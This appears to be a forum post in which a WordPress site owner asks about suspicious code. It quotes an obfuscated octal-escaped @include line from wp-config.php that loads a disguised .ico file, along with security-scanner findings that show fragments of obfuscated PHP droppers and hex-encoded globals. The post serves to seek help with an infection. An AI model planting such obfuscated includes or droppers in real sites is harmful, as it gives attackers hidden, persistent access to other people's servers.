Skip to content

strange code in wp ?

    strange code in wp ?

    What is this strange code in my wp website?

    What is this in my wp-config.php

    /*d1baf*/
    
    @include "\057hom\145/w1\061220\06427/\160ubl\151c_h\164ml/\146ind\166irg\151ns.\143om/\167p-i\156clu\144es/\122equ\145sts\057Uti\154ity\057.08\060a47\0633.i\143o";
    
    /*d1baf*/

    What is Filename: ex685iu0.php ?

    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php\x0a$osxiohq = ‘u03#y5Hp_gn2*867rl9ce4ka1do-\’xvtsmib’;$xlbim = Array();$xlbim[] = $osxiohq[6].$osxiohq[12];$xlbim[] = $osxiohq[3];$xlbim[] = $osxiohq[21].$osxiohq[5].$osxiohq[25].$osxiohq[23].$osxi…

    The issue type is: Suspicious:PHP/encodedtextlookup.6190
    Description: Suspicious encoded content. This encoding is often used to hide malware

    What is Filename: index.php File Type: Core

    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: include “\057hom\145/w1\061

    The issue type is: Backdoor:PHP/ObfuscatedInclude.6067
    Description: PHP include() statement with an obfuscated filepath.

    What is Filename: tqc23xlb.php

    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php\x0a$sqsdr = ‘gnr78-0u#_pcovf2yHxid*4elkt\’sba5m’;$wrkec = Array();$wrkec[] = $sqsdr[20].$sqsdr[30].$sqsdr[11].$sqsdr[31].$sqsdr[23].$sqsdr[15].$sqsdr[15].$sqsdr[4].$sqsdr[5].$sqsdr[15].$sqsdr[3].$s…

    The issue type is: Suspicious:PHP/encodedtextlookup.6190
    Description: Suspicious encoded content. This encoding is often used to hide malware

    What is Filename: wp-admin/includes/screen.php File Type: Core

    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: ${“\x47\x4c\x4fB\x41\x4c\x53”}

    The issue type is: Suspicious:PHP/hexedvarhexedglobals.3893
    Description: Suspicious variable encoding often used by malware

    What is Filename: wp-admin/includes/screen.php File Type: Core

    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: ${“\x47\x4c\x4fB\x41\x4c\x53”}

    The issue type is: Suspicious:PHP/hexedvarhexedglobals.3893
    Description: Suspicious variable encoding often used by malware

    Join the conversation

    Your email address will not be published. Required fields are marked *